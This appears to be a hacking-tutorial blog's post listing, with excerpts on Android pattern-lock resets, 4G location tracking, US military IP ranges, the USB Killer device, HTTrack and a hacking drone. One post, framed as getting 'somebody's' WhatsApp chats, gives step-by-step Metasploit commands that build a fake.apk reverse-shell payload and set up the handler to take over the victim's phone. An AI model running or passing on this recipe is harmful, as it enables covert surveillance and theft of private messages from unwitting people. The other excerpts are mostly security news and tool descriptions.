Posts

"Remotely Bypass" Pattern Lock Of Android Device By Google

Image
Older versions of Android can be remotely reset by Google if the company is issued with a court order, but only if they're locked using a pattern. This is according to a document prepared by the New York District Attorney's Office which revealed just how easily investigators could see the contents of a device. Devices running Android 5.0 and newer cannot be remotely reset as they use full disk encryption. However, this option is not switched on by default. The report found any device using an older version of the operating system is vulnerable to remote reset and according to the Android Developer Dashboard, this is 74.1 per cent of Android devices currently being used. However, this figure is slightly misleading. The remote reset feature does apply to phones running operating systems before Android L, but it only applies to people how have secured their device with a pattern. Google can't remotely reset phones secured with a PIN or passcode, meaning the numbe

WhatsApp And Facebook Signals Can Be Used To Get Your Location

Image
Hackers can monitor 4G mobile networks to detect users' location using supposedly anonymised identifiers Security researchers have revealed how simply contacting somebody via WhatsApp or Facebook messenger can reveal a smartphone owner's location by exploiting a security flaw in 4G mobile networks. A hacker could use the apps to discover the supposedly anonymised identifiers that are assigned to devices when they connect to a network, and use them to locate their owner, according to researchers in Finland and Germany. When a smartphone connects to a mobile network, it is assigned a temporary number called a TMSI (Temporary Mobile Subscriber Identity). The network then uses this eight-digit number to identify a device, rather than a phone number, to make communication more private. However, a hacker monitoring radio communications could tie this TMSI to an individual by sending them a Facebook message or WhatsApp chat, both of which trigger a special "paging reques

Important!!! Alert If You Want To Learn Ethical Hacking

Do Not Scan These IP Addresses ( Unless you want to get into trouble ) The IP addresses listed in the below images are associated with critical information resource centers of US. Scanning these IP addresses will be considered an attempt to break the US's Information Security. Therefore do not scan these IP addresses unless you want to get into trouble. Credits to Hacking-Tutorial.com for the list. RANGE 6 6.* – Army Information Systems Center RANGE 7 7.*.*.* Defense Information Systems Agency, VA RANGE 11 11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC RANGE 21 21. – US Defense Information Systems Agency RANGE 22 22.* – Defense Information Systems Agency RANGE 24 24.198.*.* RANGE 25 25.*.*.* Royal Signals and Radar Establishment, UK RANGE 26 26.* – Defense Information Systems Agency RANGE 29 29.* – Defense Information Systems Agency RANGE 30 30.* – Defense Information Systems Agency RANGE 49 49.* – Joint Ta

Want To Fry A Laptop? Use USB Killer 2.0

Image
The Russian cybersecurity expert, Dark Purple , who created the devious USB Killer pen drive, has created a new version of the malicious hardware that can brick a device as soon as it is plugged in. In a new blog post (link in Russian), the somewhat anonymous Dark Purple described his device, simply titled USB Killer v2.0. It doesn’t install any malware on your computer once you plug it in. Instead it sends a 220-volt charge through the USB’s signal lines and destroys the computer. The original USB Killer, first revealed online back in March, administered 110 volts, which was more than enough to fry your computer anyway. USB Killer looks quite inconspicuous, too, and could be easily mistaken for an average USB drive. Dark Purple posted a short video demonstrating the USB in action, where he destroys the motherboard of a Lenovo Thinkpad X60 laptop, which he bought specifically for the test, in just a couple of seconds. As viewers can see, the USB stick looks normal, and there

Decrypt Whatsapp Database To Get Chat List

Are you curious about how to get somebody's whatsapp chat list. Just follow Credits To -> How To Decrypt Whatsapp Database. Before starting the database decryption process,first obtain remote access to android device: 1. Start terminal and type: msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=81 R > fake.apk [ Lhost=Attacker IP address, Lport=local port ] This command will generate fake.apk in home directory. 2. Type: msfconsole This command will start the metasploit framework. 3. Type: use exploit/multi/handler In order to get multiple session on a single multi/handler. 4. Type: set payload android/meterpreter/reverse_tcp This will provide the reverse connection from victim to attacker computer. 5. Type: show options It will show the available options like lhost,lport 6. Set LHOST=192.168.0.2 7. Set LPORT=81 8. EXPLOIT Now Run the app created in step 1 on your android phone and you'll get a meterpreter session After getting the meterpreter session

View Websites Without Internet

Image
If you are intrested in browsing a website without internet connection so just follow this. HTTrack . is a free and open source Web crawler and offline browser, developed by Xavier Roche and licensed under the GNU General Public License Version 3. HTTrack allows users to download World Wide Web sites from the Internet to a local computer.By default, HTTrack arranges the downloaded site by the original site's relative link-structure. The downloaded (or "mirrored") website can be browsed by opening a page of the site in a browser. HTTrack uses a Web crawler to download a website. Some parts of the website may not be downloaded by default due to the robots exclusion protocol unless disabled during the program. HTTrack can follow links that are generated with basic JavaScript and inside Applets or Flash, but not complex links (generated using functions or expressions) or server-side image maps. Go to the below link and download for Windows, Linux, Android. To Downlo

A drone that can steal data just by hovering above you

‘Aerial Assault’ Drone Helps Hackers Penetrate Internet Networks by hovering above If you are a hacker and want to infiltrate Internet networks in areas out of reach, you can try this new drone. Aerial Assault drone is a unmanned aerial vehicle which is available for $2,500 and has the ability to hover about the target network, sniff vulnerabilities in the PCs below and report back to the owner. http://www.techworm.net/2015/08/a-drone-that-can-steal-data-just-by-hovering-above-you.html Check the link for complete Information.